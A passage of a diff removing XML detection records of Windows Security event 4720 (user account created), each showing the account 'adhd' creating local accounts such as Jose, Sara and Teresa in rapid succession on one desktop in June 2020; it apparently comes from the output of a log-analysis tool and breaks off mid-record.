-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:53.8085751Z'/&gt;&lt;EventRecordID&gt;4231&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Jose&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1031&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Jose&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Jose</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4225</recordid>
-            <time>2020-06-11 22:04:53.725813300Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:53.7258133Z'/&gt;&lt;EventRecordID&gt;4225&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Sara&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1030&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Sara&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Sara</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4219</recordid>
-            <time>2020-06-11 22:04:53.628418900Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:53.6284189Z'/&gt;&lt;EventRecordID&gt;4219&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Timothy&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1029&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Timothy&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Timothy</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4213</recordid>
-            <time>2020-06-11 22:04:53.552870700Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:53.5528707Z'/&gt;&lt;EventRecordID&gt;4213&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Ashley&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1028&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Ashley&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Ashley</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4207</recordid>
-            <time>2020-06-11 22:04:53.482231100Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:53.4822311Z'/&gt;&lt;EventRecordID&gt;4207&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Ronald&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1027&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Ronald&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Ronald</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4201</recordid>
-            <time>2020-06-11 22:04:53.392886000Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:53.3928860Z'/&gt;&lt;EventRecordID&gt;4201&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Steven&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1026&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Steven&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Steven</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4195</recordid>
-            <time>2020-06-11 22:04:53.310005100Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:53.3100051Z'/&gt;&lt;EventRecordID&gt;4195&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Jacob&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1025&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Jacob&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Jacob</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4189</recordid>
-            <time>2020-06-11 22:04:53.229727900Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:53.2297279Z'/&gt;&lt;EventRecordID&gt;4189&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Howard&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1024&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Howard&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Howard</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4183</recordid>
-            <time>2020-06-11 22:04:53.153835300Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:53.1538353Z'/&gt;&lt;EventRecordID&gt;4183&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Teresa&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1023&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Teresa&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Teresa</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4177</recordid>
-            <time>2020-06-11 22:04:53.39583500Z</time>
-            <channel>Security</channel>
